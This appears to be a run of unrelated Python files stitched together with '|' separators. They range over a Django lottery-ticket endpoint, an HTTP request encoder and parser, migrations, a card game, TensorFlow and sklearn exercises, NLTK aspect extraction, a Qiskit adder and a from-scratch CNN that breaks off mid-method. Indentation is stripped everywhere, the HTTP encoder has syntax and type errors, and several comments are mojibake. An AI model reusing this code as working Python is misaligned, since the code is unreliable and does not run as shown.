class SubmitNumbers(View):
@rest
@Authenticate()
def post(self,request):
data = json.loads(request.body)
numbers = data['numbers']
print "numbers in game",type(numbers)
#user = data["user"]
user = request.yoo["user"]
user_id = user.id
game_type = data["game_type"]
division = data["division"]
draw_date = data["drawingDate"]
lines_no = data["lines"]
coins = 2 * lines_no
if division == 'CA':
game_types = {1:20,0:21}
components = {20:"Powerballca",21:"MegaMillionsCA"}
division_id = 2
else:
game_types = {1:1,0:2}
components = {1:"Powerball",2:"MegaMillions"}
division_id = 1
game_types = game_types[int(game_type)]
submission_record = None
submission = uuid.uuid4().hex[:16]
date = datetime.datetime.strptime(draw_date, "%Y-%m-%d").date()
component = LotteryGameComponent.objects.get(identifier=components[game_types])
draw, created = LotteryDraw.objects.get_or_create(component=component, date=date,division_id=division_id)
try:
ticket_info,created = FantasyTicket.objects.get_or_create(user_id = user_id,division = division,gameType = game_type,lines_no = lines_no)
except:
ticket_info = FantasyTicket.objects.filter(user_id = user_id,division = division,gameType = game_type,lines_no = lines_no)#[0]
updated_draw, created = LotteryDraw.objects.get_or_create(component=game_types,division_id=division_id,date=date)
tickets = {}
for i in numbers:
validate_numbers(i,game_type)
if updated_draw.id != ticket_info.draw_id :
# create new ticket
print updated_draw.id
new_ticket_info, created = FantasyTicket.objects.get_or_create(user=ticket_info.user,draw=updated_draw,division=division)
valid_draw = updated_draw.id
valid_ticket = new_ticket_info.id
tickets[valid_ticket] = new_ticket_info
submission_record, created = FantasyTicketSubmission.objects.get_or_create(submission=submission, ticket_id=valid_ticket)
submission_record.save()
# create new play
for line in numbers:
serialized = dumps(line)
play_record = FantasyTicketPlay(play=serialized,ticket_id=int(new_ticket_info.id),division = division)
play_record.submission_old = submission
play_record.submission = submission_record
play_record.save()
else:
# - if draw is same
valid_draw = ticket_info.draw_id
valid_ticket = ticket_info.id
tickets[valid_ticket] = ticket_info
submission_record, created = FantasyTicketSubmission.objects.get_or_create(submission=submission, ticket_id=valid_ticket)
submission_record.save()
#update previous play
for line in numbers:
serialized = dumps(line)
play_record, created = FantasyTicketPlay.objects.get_or_create(play=serialized,ticket=ticket_info,division=LotteryCountryDivision.objects.get(remote_id=division))
play_record.submission_old = submission
play_record.submission = submission_record
play_record.save()
return {"success":True,"coins":coins}
class FantasyTicketCheck(View):
@rest
@Authenticate(create=False)
def post(self, request, _id):
user = request.yoo["user"]
ticket = FantasyTicket.objects.get(pk=_id)
if ticket.user_id!= user:
raise exceptions.WebServiceAuthorizationFailed()
if ticket.draw_id.result:
for submission in ticket.submissions.all():
submission.checked = True
submission.save()
allocated = ticket.update(full=True)
_result = ticket.representation()
_result["coins"] = allocated
return _result
def put(self, *args, **kwargs):
return self.post(*args, **kwargs) |
class httpencode:
def __init__(self, url, method="PUT", version="HTTP/1.1"):
self.url = url
self.method = method
self.version = version
self.headers = {}
self.body = ""
def addheader(self, key, value):
self.headers[key] = value
def delheader(self, key)
del self.headers[key]
def appendbody(self, data):
self.body.append(data)
def resetbody(self):
self.body = ""
def encode(self):
url = "%s %s %s\r\n" %(self.method, self.url, self.version)
if self.method == "POST":
self.addheader("Connection", "Keep-Alive")
self.addheader("Content-Length", str(len(self.body)))
headerlist = [ "%s: %s" %(k, v) for k, v in self.headers.items()]
header = "\r\n".join(headerlist)
if len(self.body) > 0:
return url + header + "\r\n\r\n" + self.body
else:
return url + header + "\r\n"
#User-Agent๏ผไบง็่ฏทๆฑ็ๆต่งๅจ็ฑปๅใ
#Accept๏ผๅฎขๆท็ซฏๅฏ่ฏๅซ็ๅ
ๅฎน็ฑปๅๅ่กจใ
#Host๏ผ่ฏทๆฑ็ไธปๆบๅ๏ผๅ
่ฎธๅคไธชๅๅๅๅคไธไธชIPๅฐๅ๏ผๅณ่ๆไธปๆบใ
#Connection: Keep-Alive
class httpdecode:
def __init__(self, str):
self.all = str
self.body = ""
self.method = ""
self.url = ""
self.version = ""
self.headers = {}
def decode(self):
index0 = self.all.find(b"\r\n\r\n")
request_predata = self.all[0:index0]
index1 = request_predata.find(b"\r\n")
request_first_data = request_predata[0:index1]
tags = request_first_data.split(" ")
self.method = tags[0]
self.url = tags[1]
self.version = tags[2]
request_header_data = request_predata[index1:]
for line in request_header_data.split("\r\n"):
if line != "":
line = line.replace(" ","")
restemp = line.split(":")
if restemp[0] == "Host" and len(restemp) == 3:
restemp[1] = restemp[1] + ":" +restemp[2]
self.headers[restemp[0]] = restemp[1]
if index0 >= 0:
self.body = self.all[index0+4:]
|
from __future__ import (division, print_function)
from WMCore.REST.CherryPyPeriodicTask import CherryPyPeriodicTask
from WMCore.Services.WMStats.WMStatsWriter import WMStatsWriter, convertToServiceCouchDoc
class HeartbeatMonitorBase(CherryPyPeriodicTask):
def __init__(self, rest, config):
super(HeartbeatMonitorBase, self).__init__(config)
self.centralWMStats = WMStatsWriter(config.wmstats_url)
self.threadList = config.thread_list
def setConcurrentTasks(self, config):
"""
sets the list of function reference for concurrent tasks
"""
self.concurrentTasks = [{'func': self.reportToWMStats, 'duration': config.heartbeatCheckDuration}]
def reportToWMStats(self, config):
"""
report thread status and heartbeat.
Also can report additional mointoring information by rewriting addAdditionalMonitorReport method
"""
self.logger.info("Checking Thread status...")
downThreadInfo = self.logDB.wmstats_down_components_report(self.threadList)
monitorInfo = self.addAdditionalMonitorReport(config)
downThreadInfo.update(monitorInfo)
wqSummaryDoc = convertToServiceCouchDoc(downThreadInfo, config.log_reporter)
self.centralWMStats.updateAgentInfo(wqSummaryDoc)
self.logger.info("Uploaded to WMStats...")
return
def addAdditionalMonitorReport(self, config):
"""
add Additonal report with heartbeat report
overwite the method with each applications monitoring info. (Need to follow the format displayed in wmstats)
"""
return {} |
# Generated by Django 3.2.4 on 2021-06-29 17:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('cards', '0002_auto_20210629_1348'),
]
operations = [
migrations.AlterField(
model_name='card',
name='deck',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='cards.deck'),
),
migrations.AlterField(
model_name='deck',
name='owner',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='owner_deck', to=settings.AUTH_USER_MODEL),
),
]
|
import random
class Card():
def __init__(self, suit, number):
self.suit = suit
self.number = number
def __repr__(self):
return "{}:{}".format(self.suit, self.number)
class Deck():
suits = ["Spade", "Heart", "Diamond", "Clover"]
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
def __init__(self):
self.cards = []
for suit in self.suits:
for number in self.numbers:
card = Card(suit, number)
self.cards.append(card)
##This __init__ creates 52 cards for a deck.
def shuffle(self):
self.new_cards = []
for i in range(52):
random_card = random.choice(self.cards)
self.cards.remove(random_card)
self.new_cards.append(random_card)
self.cards = self.new_cards
class Player():
def __init__(self):
self.cards = []
def draw(self, deck, draw_number=1):
for i in range(draw_number):
drawed_card = deck.cards.pop()
self.cards.append(drawed_card)
#draw a card from "deck" "number" times
def give(self, deck, card):
self.cards.remove(card)
deck.cards.append(card)
#give a "card" to "deck"
the_deck = Deck()
the_deck.shuffle()
me = Player()
bob = Player()
me.draw(the_deck,5)
bob.draw(the_deck,5)
print(me.cards)
chosen_card = input("Which card do you wannna give bob?\n")
me.give(bob,chosen_card)
print(me.cards)
print(bob.cards)
|
"""Module with the Constants used in the kytos/Kronos."""
DEFAULT_BACKEND = 'INFLUXDB'
BACKENDS = {}
BACKENDS['INFLUXDB'] = {
'USER': 'foo',
'PASS': 'bar',
'PORT': 8086,
'HOST': 'localhost',
'DBNAME': 'kytos',
'POOL_SIZE': 100
}
BACKENDS['CSV'] = {
'USER': 'foo',
'PATH': 'data/'
}
|
if __name__ == "__main__":
x1, y1 = map(int, input().split())
x2, y2 = map(int, input().split())
n = int(input())
dx = abs(x2 - x1)
dy = abs(y2 - y1)
n -= dx
n -= dy
if n < 0 or n % 2 != 0:
print("N")
else:
print("Y")
|
# Linear regression with TF
# from '09_up_and_running_with_tensorflow.jpynb'
#
# Use TF optimizer
#
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
from sklearn.datasets import fetch_california_housing
def reset_graph(seed=42):
tf.reset_default_graph()
tf.set_random_seed(seed)
np.random.seed(seed)
reset_graph()
housing = fetch_california_housing()
m,n = housing.data.shape
housing_data_plus_bias = np.c_[np.ones((m,1)), housing.data]
#%%
X = tf.constant(housing_data_plus_bias, dtype=tf.float32, name="X")
y = tf.constant(housing.target.reshape(-1, 1), dtype=tf.float32, name="y")
#%%
# Use batch gradient descent --------------------------------------------
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
# scale the data
scaled_housing_data = scaler.fit_transform(housing.data)
scaled_housing_data_plus_bias = np.c_[np.ones((m, 1)), scaled_housing_data]
reset_graph()
n_epochs = 1000 # number of iterations of gradient descent algorithm
learning_rate = 0.01 # gradient descent step size
X = tf.constant(scaled_housing_data_plus_bias, dtype=tf.float32, name="X")
y = tf.constant(housing.target.reshape(-1, 1), dtype=tf.float32, name="y")
theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name="theta")
y_pred = tf.matmul(X, theta, name="predictions")
error = y_pred - y
# Computes the mean (reduces to a scalar value)
mse = tf.reduce_mean(tf.square(error), name="mse")
# Using TF's optimizer (here a gradient descent optimizer)
optimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate)
training_op = optimizer.minimize(mse)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init) # Do this once at the beginning of all the iterations
for epoch in range(n_epochs): # iterate over the training epochs
if epoch % 100 == 0:
print("Epoch", epoch, "MSE =", mse.eval())
sess.run(training_op)
best_theta = theta.eval()
|
import matplotlib.pylab as plt
from NeuralNetwork.ShallowNeuralNetwork.testCases import *
import sklearn.linear_model
from NeuralNetwork.ShallowNeuralNetwork.planar_utils import plot_decision_boundary, load_planar_dataset
X, Y = load_planar_dataset()
plt.scatter(X[0, :], X[1, :], c=np.squeeze(Y), s=40, cmap=plt.cm.Spectral)
shape_X = X.shape
shape_Y = Y.shape
m = X.shape[1]
print("The shape of X is: " + str(shape_X))
print("The shape of Y is: " + str(shape_Y))
print("The number of training examples is: " + str(m))
clf = sklearn.linear_model.LogisticRegressionCV() #ไฝฟ็จไบคๅ้ช่ฏ้ๆฉๆญฃๅๅๅๆฐC
clf.fit(X.T, Y.T) #XๅYไฝฟ็จ่ก็ฉ้ต๏ผๆไปฅ่ฝฌ็ฝฎ
plot_decision_boundary(lambda x: clf.predict(x), X, Y)
plt.title("Logistic Regression")
LR_predictions = clf.predict(X.T)
print("Accuracy of logistic regression: %d" % float((np.dot(Y, LR_predictions) + np.dot(1 - Y, 1 - LR_predictions)) / float(Y.size) * 100) + '%' + "(percentage of correctly labelled datapoints)")
#plt.show()
#LogisticRegression did not work well on non-linear model like "flower dataset"
|
#!/usr/bin/python3
"""MyInt"""
class MyInt(int):
"""inherits from int, has == and != inverted"""
def __eq__(self, value):
"""overiding == operator"""
return self.real != value
def __ne__(self, value):
"""overriding != operator"""
return self.real == value
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-27 13:56
from __future__ import unicode_literals
from django.db import migrations, models
import question.models
class Migration(migrations.Migration):
dependencies = [
('question', '0005_auto_20170115_1759'),
]
operations = [
migrations.AlterField(
model_name='question',
name='audio',
field=models.FileField(blank=True, upload_to=question.models.upload_location),
),
migrations.AlterField(
model_name='question',
name='script',
field=models.FileField(blank=True, upload_to=question.models.upload_location),
),
migrations.AlterField(
model_name='question',
name='video',
field=models.FileField(blank=True, upload_to=question.models.upload_location),
),
]
|
from django.conf.urls import url
from django.urls import include
from rest_framework import routers
from articles.views import ArticleViewSet, ArticleChangesListViewSet, SetCurrentChangeSetView
router = routers.DefaultRouter()
router.register(r'article', ArticleViewSet)
router.register(r'article_changeset', ArticleChangesListViewSet)
urlpatterns = [
url(r'^', include(router.urls)),
url(r'^set_changeset/(?P<changeset_id>\d+)/?$', SetCurrentChangeSetView.as_view()),
] |
# import re
# file = open("cleaned.csv", 'w', encoding='utf-8')
# file.write("PID,Player,Team,Apps,Minutes,Goals,Assists,xG,xA,xG90,xA90\n")
# for line in open("test.txt", encoding='utf-8'):
# #line = line.replace("\+\d.\d\d\s"," ")
# line = re.sub(r"\+\d.\d\d\s", " ", line)
# line = re.sub(r"\-\d.\d\d\s", " ", line)
# if len(line)>43:
# line = line.replace(" ", ",", 1)
# line = line.replace(" Arsenal",",Arsenal")
# line = line.replace(" Bournemouth",",Bournemouth")
# line = line.replace(" Brighton",",Brighton")
# line = line.replace(" Burnley",",Burnley")
# line = line.replace(" Chelsea",",Chelsea")
# line = line.replace(" Crystal Palace",",Crystal Palace")
# line = line.replace(" Everton",",Everton")
# line = line.replace(" Huddersfield",",Huddersfield")
# line = line.replace(" Leicester",",Leicester")
# line = line.replace(" Liverpool",",Liverpool")
# line = line.replace(" Manchester City",",Manchester City")
# line = line.replace(" Manchester United",",Manchester United")
# line = line.replace(" Newcastle United",",Newcastle United")
# line = line.replace(" Southampton",",Southampton")
# line = line.replace(" Stoke",",Stoke")
# line = line.replace(" Swansea",",Swansea")
# line = line.replace(" Tottenham",",Tottenham")
# line = line.replace(" Watford",",Watford")
# line = line.replace(" West Bromwich Albion",",West Bromwich Albion")
# line = line.replace(" West Ham",",West Ham")
# line = line.replace(" 0",",0")
# line = line.replace(" 1",",1")
# line = line.replace(" 2",",2")
# line = line.replace(" 3",",3")
# line = line.replace(" 4",",4")
# line = line.replace(" 5",",5")
# line = line.replace(" 6",",6")
# line = line.replace(" 7",",7")
# line = line.replace(" 8",",8")
# line = line.replace(" 9",",9")
# line = line.replace("-",",-")
# line = line.replace("+",",+")
# line = line.replace("n,-","n-")
# line = line.replace("o,-","o-")
# line = line.replace("g,-","g-")
# line = line.replace("u,-","u-")
# line = line.replace("s,-","s-")
# line = line.replace("d,-","d-")
# line = line.replace("r,-","r-")
# line = line.replace("e,-","e-")
# line = line.replace("t,-","t-")
# file.write(line)
import pandas as pd
df = pd.read_csv('cleaned.csv')
print(df) |
####THIS FILE USES THE DICTIONARY TO EXTRACT ASPECTS RATHER THAN THE
####SEMANTIC DIFFERENCE. USE BWT_PROCESS_SENTENCE.PY IF YOU WANT SEMANTIC DIFFERENCE
import csv
import string
import re
from nltk.corpus import wordnet as wn
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk import pos_tag
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.corpus import stopwords
import pickle
test_sent = "This is Brendan's test sentence, it contains GAS, gas, gas and gas and ENGINE and CLIMATE."
def processSentenceDictionary(input_sentence):
#these solutions for removing punctuation do not work with the web interface
#noPunctuation = str(input_sentence).translate(None, string.punctuation)
#noPunctuation = input_sentence.translate(input_sentence.maketrans(
# {key: None for key in string.punctuation})).strip()
#create a character class from the standard string of punctuation characters
remove_str = '[' + string.punctuation + ']'
#replace each punctuation character with the empty string
noPunctuation = re.sub(remove_str, '', input_sentence)
#tokenize sentence into words
sentenceWords = word_tokenize(noPunctuation)
#create list of words with part of speech tags
posTagged = pos_tag(sentenceWords)
#create list of stop words
removeTheseWords = set(stopwords.words('english'))
#remove stop words from sentence
stopWordsRemoved = [word.lower() for word in sentenceWords if word.lower()
not in removeTheseWords and
len(word) > 2]
#remove stop words from list of words with part of speech tags
posTaggedNoStopWords = [(word.lower(),pos) for (word,pos) in posTagged if word.lower()
not in removeTheseWords and
len(word) > 2]
#remove all words except adjectives, verbs, nouns, and adverbs
convertedPOSTags = []
for word,pos in posTaggedNoStopWords:
if pos.startswith('J'):
convertedPOSTags.append(((word,wn.ADJ)))
if pos.startswith('V'):
convertedPOSTags.append(((word,wn.VERB)))
if pos.startswith('N'):
convertedPOSTags.append(((word,wn.NOUN)))
if pos.startswith('R'):
convertedPOSTags.append(((word,wn.ADV)))
## #debugging code for removing stop words and all words except nouns
## print("gmo combined remove of stop and select only nouns")
## convertedPOSTags = [(word.lower(),'n') for (word,pos) in posTagged if word.lower()
## not in removeTheseWords and not word.isnumeric() and
## len(word) > 2 and pos.startswith('N')]
#choose lemmatizer
lemmatizer = WordNetLemmatizer()
#reduce each word to its lemma root based on the part of speech tag
lemmatizedSentence = [lemmatizer.lemmatize(word,tag) for (word,tag) in convertedPOSTags]
taxwords = []
taxsynonyms = []
taxweights = []
#read taxonomy file to get aspect words, aspect synonym words, and aspect weights
taxonomy = open('/home/sysadmin/gmrepo/GMCustSent/rankcars/scripts/taxdictionarytrimmed.csv','r')
readfile = csv.reader(taxonomy)
for row in readfile:
#print(row)
if row[0] not in taxwords:
taxwords.append(row[0])
taxsynonyms.append([])
taxweights.append(row[2])
taxsynonyms[taxwords.index(row[0])].append(row[1])
taxonomy.close()
## #debugging print statements
## print(taxwords)
## print(taxsynonyms)
## print(taxweights)
## #no longer using synsets to identify aspects
## for word in taxwords:
## allTaxSyns.append([syns for syns in wn.synsets(word)])
#debugging print statements
#[[ss] for word in taxwords for ss in wn.synsets(word)]
#print(allTaxSyns)
#print(taxwords)
sentenceAspects = []
#for each word in the sentence, identify the word as an aspect if it matches the aspect word or one of the aspect word's synonyms from the taxonomy file
for word in lemmatizedSentence:
for tax in taxwords:
if word.lower() == tax.lower() and tax not in sentenceAspects:
sentenceAspects.append(tax)
elif taxsynonyms[taxwords.index(tax)]:
for taxsyn in taxsynonyms[taxwords.index(tax)]:
if word.lower() == taxsyn.lower() and tax not in sentenceAspects:
sentenceAspects.append(tax)
## #debugging code for creating output file to track which aspects are found in each sentence
## sentence
## aspects
## outputfile = open("dictionaryOutput.txt","a+")
## outputfile.write("\n")
## outputfile.write(input_sentence + "\n")
## for aspect in sentenceAspects:
## outputfile.write("\t" + aspect+"\n")
## outputfile.write("\n")
## outputfile.flush()
## outputfile.close()
return sentenceAspects
###debugging print statement using test sentence
##print(processSentenceDictionary(test_sent))
|
with open('rule.txt') as f:
id = ''
lines = f.readlines()
for line in lines:
id = line.split(' ')[0]
print(id) |
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister, execute, Aer
#Subroutines
# Carry
c_c = QuantumRegister(1)
a_c = QuantumRegister(1)
b_c = QuantumRegister(2)
carry = QuantumCircuit(c_c, a_c, b_c, name="carry")
carry.ccx(a_c[0], b_c[0], b_c[1])
carry.cx(a_c[0], b_c[0])
carry.ccx(c_c[0], b_c[0], b_c[1])
carry.cx(a_c[0], b_c[0])
# Carry -1
c_i = QuantumRegister(1)
a_i = QuantumRegister(1)
b_i = QuantumRegister(2)
carry_i = QuantumCircuit(c_i, a_i, b_i, name="carry_inverse")
carry_i.cx(a_i[0], b_i[0])
carry_i.ccx(c_i[0], b_i[0], b_i[1])
carry_i.cx(a_i[0], b_i[0])
carry_i.ccx(a_i[0], b_i[0], b_i[1])
# Sum
c_s = QuantumRegister(1)
a_s = QuantumRegister(1)
b_s = QuantumRegister(1)
sum_c = QuantumCircuit(c_s, a_s, b_s, name="sum")
sum_c.cx(a_s[0], b_s[0])
sum_c.cx(c_s[0], b_s[0])
# Add
def Add(n):
c_a = QuantumRegister(n)
a_a = QuantumRegister(n)
b_a = QuantumRegister(n+1)
add = QuantumCircuit(c_a, a_a, b_a, name="add")
#base case
if (n == 1):
add.append(carry, [c_a[0], a_a[0], b_a[0], b_a[1]])
add.append(sum_c, [c_a[0], a_a[0], b_a[0]])
else:
add.append(carry, [c_a[0], a_a[0], b_a[0], b_a[1]])
add.append(sum_c, [c_a[0], a_a[0], b_a[0]])
add.append(Add(n-1), c_a[1:n] + a_a[1:n] + b_a[1:n+1])
#add.append(carry, [c_a[0], a_a[0], b_a[0], b_a[1]])
return add
c = QuantumRegister(2, name="c")
a = QuantumRegister(2, name="a")
b = QuantumRegister(3, name="b")
m = ClassicalRegister(3, name="m")
q = QuantumCircuit(c, a, b, m, name="add")
c_input = input("c> ")
a_input = input("a> ")
for i in range(0, 2):
if (c_input[i] == "1"):
q.x(c[1 - i])
if (a_input[i] == "1"):
q.x(a[1 - i])
q.append(Add(2), c[0:2] + a[0:2] + b[0:3])
q.measure(b, m)
print(q.decompose())
# Execute the circuit
job = execute(q, backend = Aer.get_backend('qasm_simulator'), shots=1)
result = job.result()
# Print the result
print(result.get_counts(q)) |
#!/usr/bin/env python
import copy
import fuel.datasets
import fuel.schemes
import fuel.streams
import fuel.transformers
import itertools
import numpy as np
import scipy.signal
import sys
import time
N_L0_UNITS = 25
N_L1_UNITS = 15
N_OUTPUT_UNITS = 10
INPUT_WIDTH = 28
INPUT_HEIGHT = 28
KERNEL_SIZE = 4
KERNELS_COUNT = 5
POOLING_SIZE = 4
INPUT_SIZE = INPUT_WIDTH * INPUT_HEIGHT
START_LEARN_RATE = 0.1
MIN_LEARN_RATE = 0.0005
N_GENERATIONS = 200
BATCH_SIZE = 100
VALIDATION_DATA_PART = 0.1
# If validation error will be worse then the best seen that number
# of epochs in row, we'll stop learning and use best model that we've found.
NUM_VALIDATION_SET_WORSINESS_TO_GIVE_UP = 10
NUM_VALIDATION_SET_WORSINESS_TO_DECREASE_RATE = 4
class Layer(object):
def forward_propagate(self, input_vector):
raise NotImplemented()
def num_params_matrices(self):
raise NotImplemented()
def compute_gradients_errors_vector(self, errors):
"""
Returns one or more of vectors.
First - error gradients relative to this layer input,
required for error back propagation
Second and further, |num_params_matrices| total - gradients for that
layer's weights, biases, etc.
Must be called immediatelly after forward_propagate (used values, cached
by it).
"""
raise NotImplemented()
def update_params(self, params_update_vectors):
"""
weights_update_vectors - vectors in the same order as produced
by compute_gradients_errors_vector (shifted by one, that is without
gradients relative to vector input.
"""
raise NotImplemented()
@staticmethod
def _rand_matrix(n_rows, n_columns):
return np.random.rand(n_rows, n_columns) - 0.5
class WeightsBiasLayer(Layer):
"""
Intermediate class for fully connected layers computing
f(w*x+b)
"""
def __init__(self, input_size, num_units):
super(WeightsBiasLayer, self).__init__()
self._input_size = input_size
self._num_units = num_units
self._weights = Layer._rand_matrix(num_units, input_size)
self._biases = Layer._rand_matrix(num_units, 1)
def _forward_propagate_with_function(self, input_vector, function):
assert not np.any(np.isnan(self._weights))
assert not np.any(np.isnan(self._biases))
assert input_vector.shape == (self._input_size, 1)
self._last_input = input_vector
self._last_activations_input = np.dot(self._weights, input_vector) + self._biases
assert self._last_activations_input.shape == (self._num_units, 1)
return function(self._last_activations_input)
def num_params_matrices(self):
return 2
def _errorrs_in_function_grad(self, errors):
"""
Converts errors gradients of f(w * x + b) to gradients for errors of
(w * x + b). Subclasses must implement this.
"""
raise NotImplemented()
def compute_gradients_errors_vector(self, errors):
assert errors.shape == (self._num_units, 1)
assert not np.any(np.isnan(errors))
errors_in_function_grad = self._errorrs_in_function_grad(errors)
assert not np.any(np.isnan(errors_in_function_grad))
assert errors_in_function_grad.shape == (self._num_units, 1)
weight_gradients = np.dot(
errors_in_function_grad, np.transpose(self._last_input))
assert weight_gradients.shape == self._weights.shape
input_gradients = np.dot(
np.transpose(self._weights), errors_in_function_grad)
assert input_gradients.shape == (self._input_size, 1)
biases_gradients = errors_in_function_grad
return [input_gradients, weight_gradients, biases_gradients]
def update_params(self, params_update_vectors):
weights_update, biases_update = params_update_vectors
self._weights += weights_update
self._biases += biases_update
assert not np.any(np.isnan(self._weights))
assert not np.any(np.isnan(self._biases))
def relu(val):
result = val.copy()
result[result < 0] *= 0.1
return result
def relu_grad_times_errors(relu_input, errors):
result = errors.copy()
result[relu_input < 0] *= 0.1
return result
class ReLULayer(WeightsBiasLayer):
"""
Fully connected to it input layer of ReLU units.
"""
def forward_propagate(self, input_vector):
return self._forward_propagate_with_function(input_vector, relu)
def _errorrs_in_function_grad(self, errors):
return relu_grad_times_errors(self._last_activations_input, errors)
class SoftMaxLayer(WeightsBiasLayer):
"""
Fully connected to it input layer of Softmax units.
"""
def forward_propagate(self, input_vector):
return self._forward_propagate_with_function(
input_vector, SoftMaxLayer._softmax)
def _errorrs_in_function_grad(self, errors):
return errors
@staticmethod
def _softmax(input_values):
val_exp = np.exp(input_values - input_values.min())
denominator = val_exp.sum()
result = val_exp / denominator
return result
def compute_convolution_kernel_gradient_fast(
input_matrix, output_matrix, kernel_shape):
assert input_matrix.shape == output_matrix.shape
# Note: [::-1,::-1] is equivalent to both np.flipud and np.fliplr.
grad_src = scipy.signal.convolve2d(
input_matrix[::-1,::-1], output_matrix, mode='full')[::-1,::-1]
input_rows, input_columns = input_matrix.shape
kernel_rows, kernel_columns = kernel_shape
return grad_src[
input_rows - 1 : input_rows - 1 + kernel_rows,
input_columns - 1 : input_columns - 1 + kernel_columns]
class ConvolutionLayer(Layer):
"""
Layer, that performs convoloution, ReLU to it output, and then performing
max pooling.
"""
def __init__(self, input_shape, kernel_size, kernels_count, pooling_size):
super(ConvolutionLayer, self).__init__()
self._kernels = []
self._last_pooling_inputs = []
for _ in xrange(kernels_count):
self._kernels.append(Layer._rand_matrix(kernel_size, kernel_size))
self._pooling_size = pooling_size
self._input_shape = input_shape
# Only support 2-D input at present
assert len(input_shape) == 2
# We do not expect pooling that drops any data or that uses filling.
assert input_shape[0] % pooling_size == 0
assert input_shape[1] % pooling_size == 0
output_rows = input_shape[0] / pooling_size
output_columns = input_shape[1] / pooling_size
self._output_shape = (output_rows, output_columns)
def output_shape(self):
return (len(self._kernels), self._output_shape[0], self._output_shape[1])
def forward_propagate(self, input_matrix):
assert input_matrix.shape == self._input_shape
self._last_convolution_input = input_matrix
self._last_pooling_inputs = []
for kernel in self._kernels:
self._last_pooling_inputs.append(relu(scipy.signal.convolve2d(
input_matrix, kernel, mode='same')))
result = np.empty(self.output_shape(), dtype=np.float64)
for index, pool_input in enumerate(self._last_pooling_inputs):
result[index, :, :] = self._pool_layer(pool_input)
return result
def _pool_layer(self, pooling_input):
filtered = scipy.ndimage.filters.maximum_filter(
pooling_input, size=self._pooling_size)
start = self._pooling_size / 2
return filtered[start::self._pooling_size, start::self._pooling_size]
def num_params_matrices(self):
return len(self._kernels)
def compute_gradients_errors_vector(self, errors):
total_input_gradient = np.zeros(
self._input_shape, dtype=np.float64)
kernel_gradients = []
assert len(self._kernels) == len(self._last_pooling_inputs)
for layer_number, inputs in enumerate(itertools.izip(
self._last_pooling_inputs, self._kernels)):
(last_pooling_input, kernel) = inputs
input_gradient, kernel_gradient = \
self._compute_gradients_errors_vector_by_kernel(
errors[layer_number,:,:],
last_pooling_input, kernel)
total_input_gradient += input_gradient
kernel_gradients.append(kernel_gradient)
result = [total_input_gradient]
result.extend(kernel_gradients)
return result
def _compute_gradients_errors_vector_by_kernel(
self, errors, last_pooling_input, kernel):
assert errors.shape == self._output_shape
maxpool_gradients = np.zeros(
self._input_shape,
dtype=np.float64)
for error_row in xrange(self._output_shape[0]):
for error_column in xrange(self._output_shape[1]):
src_start_row = error_row * self._pooling_size
src_start_column = error_column * self._pooling_size
max_index = last_pooling_input[
src_start_row : src_start_row + self._pooling_size,
src_start_column : src_start_column + self._pooling_size].argmax()
src_row = src_start_row + max_index / self._pooling_size
src_column = src_start_column + max_index % self._pooling_size
maxpool_gradients[src_row, src_column] += errors[
error_row, error_column]
# Gradient needs only sign information. ReLU does not change sign,
# so using ReLU output instead of input seems safe.
maxpool_gradients = relu_grad_times_errors(
last_pooling_input, maxpool_gradients)
# Convert gradients dE / d(convolution output) to
# gradient dE / d(input data) and dE / d(kernel)
input_gradients = scipy.signal.convolve2d(
maxpool_gradients, kernel, mode='same')
kernel_gradient = compute_convolution_kernel_gradient_fast(
self._last_convolution_input, maxpool_gradients, kernel.shape)
return [input_gradients, kernel_gradient]
def update_params(self, params_update_vectors):
assert len(self._kernels) == len(params_update_vectors)
for index, update in enumerate(params_update_vectors):
self._kernels[index] += update
class VectorizingLayer(Layer):
"""
Very simple "Layer", do only reshape operation.
Need only to simplify transition from convolution to
fully connected layers.
"""
def __init__(self, input_shape):
super(VectorizingLayer, self).__init__()
self._input_shape = input_shape
total_elements = 1
for dim in input_shape:
total_elements *= dim
self._output_shape = (total_elements, 1)
def output_shape(self):
return self._output_shape
def forward_propagate(self, input_vector):
assert input_vector.shape == self._input_shape
return input_vector.reshape(self._output_shape)
def num_params_matrices(self):
return 0
def compute_gradients_errors_vector(self, errors):
assert errors.shape == self._output_shape
return [errors.reshape(self._input_shape)]
def update_params(self, params_update_vectors):
pass
class Network(object):
def __init__(self):
self._layers = []
self._layers.append(
ConvolutionLayer(
(INPUT_WIDTH, INPUT_HEIGHT),
KERNEL_SIZE, KERNELS_COUNT, POOLING_SIZE))
self._layers.append(VectorizingLayer(self._layers[-1].output_shape()))
self._layers.append(ReLULayer(
self._layers[-1].output_shape()[0], N_L0_UNITS))
self._layers.append(ReLULayer(N_L0_UNITS, N_L1_UNITS))
self._layers.append(SoftMaxLayer(N_L1_UNITS, N_OUTPUT_UNITS))
def learn_batch(self, sample_matrices, labels, learn_rate):
gradients = []
batch_size = 0
for sample_matrix, label in itertools.izip(sample_matrices, labels):
sample_gradients = self._process_sample(sample_matrix, label)
if not gradients:
gradients = sample_gradients
else:
for index, grad in enumerate(sample_gradients):
gradients[index] += grad
batch_size += 1
# Update is equal to minus avg. gradient:
updates = []
for grad in gradients:
updates.append(-grad / batch_size)
cur_index = 0
for layer in self._layers:
next_index = cur_index + layer.num_params_matrices()
layer.update_params(updates[cur_index:next_index])
cur_index = next_index
def _process_sample(self, sample_data, label):
assert sample_data.shape == (INPUT_HEIGHT, INPUT_WIDTH)
cur_input = sample_data
for layer in self._layers:
cur_input = layer.forward_propagate(cur_input)
expected_output = np.zeros([N_OUTPUT_UNITS, 1])
expected_output[label, 0] = 1
assert cur_input.shape == expected_output.shape
# Back-propagate errors
